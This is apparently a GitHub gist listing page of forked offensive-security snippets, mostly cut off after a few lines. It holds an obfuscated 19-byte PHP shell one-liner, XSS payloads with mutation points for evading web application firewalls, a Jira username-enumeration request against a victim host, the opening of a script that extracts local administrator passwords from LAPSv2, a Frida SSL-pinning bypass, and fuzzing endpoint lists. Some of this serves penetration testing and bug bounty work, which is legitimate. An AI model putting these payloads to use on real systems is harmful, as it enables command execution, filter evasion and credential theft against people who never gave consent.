0xSojalSec / CVE-2023-21939.md

Created August 28, 2023 17:26 — forked from win3zz/CVE-2023-21939.md

CVE-2023-21939 - Code Exec - Proof of Concept

Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie

0xSojalSec / zendesk_endpoints.txt

Created July 30, 2023 18:28 — forked from win3zz/zendesk_endpoints.txt

List of Zendesk API Endpoints for Fuzzing [Penetration Testing]

	POST /api/v2/accounts
	GET /api/v2/activities?since=cstest
	GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
	GET /api/v2/automations
	POST /api/v2/automations
	GET /api/v2/bookmarks
	POST /api/v2/bookmarks
	GET /api/v2/brands
	POST /api/v2/brands
	GET /api/v2/custom_objects

0xSojalSec / lapsv2_decryptor.py

Created May 17, 2023 19:38 — forked from zblurx/lapsv2_decryptor.py

Simple script to extract local admin password in cleartext with LAPSv2 using impacket

	import argparse
	import typing
	import math
	from uuid import UUID
	from pyasn1.codec.der import decoder
	from pyasn1_modules import rfc5652
	from struct import unpack
	from cryptography import utils
	from cryptography.exceptions import AlreadyFinalized, InvalidKey
	from cryptography.hazmat.primitives.kdf import KeyDerivationFunction

0xSojalSec / TomNomNom_Q&A_INTIGRITI.txt

Created February 21, 2023 16:16 — forked from atikrahman1/TomNomNom_Q&A_INTIGRITI.txt

LIVE MENTOR SESSION: @tomnomnom . I have collected all of the the question and answer in comments section for my later read.

	INTIGRITI
	@intigriti
	Red circleLIVE MENTOR SESSION:
	@TomNomNom
	will answer your #BugBounty and tooling questions for the next 4 hours! Comment with your question!
	https://twitter.com/intigriti/status/1258729529859768320


	Question from @amalmurali47 :

0xSojalSec / mutation_a.txt

Created February 12, 2023 17:19 — forked from hackerscrolls/mutation_a.txt

Mutation points in <a> tag for WAF bypass

	<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

	[1]
	Bytes:
	\x09 \x0a \x0c \x0d \x20 \x2f

	<a/href="javascript:alert(1)">
	<a\x09href="javascript:alert(1)">

	[2,3]

0xSojalSec / rev_shell.php

Created January 28, 2023 18:46 — forked from terjanq/rev_shell.php

The shortest non-alphanumeric reverse shell script (19 bytes)

	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:

0xSojalSec / juicy.sh

Created January 2, 2023 14:43 — forked from incogbyte/juicy.sh

fast juicy files with tomnomnom wordlist and ffuf tool

	#!/bin/sh
	#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
	# ffuf tool https://github.com/ffuf/ffuf
	# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
	# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
	# usage bash juicy.sh filename.txt

	filename="$1"
	while read -r line; do
	name="$line"

0xSojalSec / mixunpin.js

Created December 11, 2022 17:40 — forked from incogbyte/mixunpin.js

Frida script to bypass common methods of sslpining Android

	console.log("[*] SSL Pinning Bypasses");
	console.log(`[*] Your frida version: ${Frida.version}`);
	console.log(`[*] Your script runtime: ${Script.runtime}`);

	/**
	* by incogbyte
	* Common functions
	* thx apkunpacker, NVISOsecurity, TheDauntless
	* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
	* !!! THIS SCRIPT IS NOT A SILVER BULLET !!

0xSojalSec / bounty_wildcards.json

Created November 4, 2022 20:12 — forked from 0xtavi/bounty_wildcards.json

Bug Bounty Paying Programs Wildcard Domains

	{
	"programs": [
	{
	"name": "spacex",
	"url": "https://bugcrowd.com/spacex",
	"wildcards": [
	"starlink.com",
	"starlinkisp.net"
	],
	"out_of_scope_domains": [],

0xSojalSec / Jira bug-exploit

Created November 3, 2022 19:03 — forked from 0x240x23elu/Jira bug-exploit

Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230






	cve-2019-8449
	The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
	https://jira.atlassian.com/browse/JRASERVER-69796
	https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
	=====================================================================================================================================

GH0ST_3exP10it 0xSojalSec

CVE-2023-21939 - Code Exec - Proof of Concept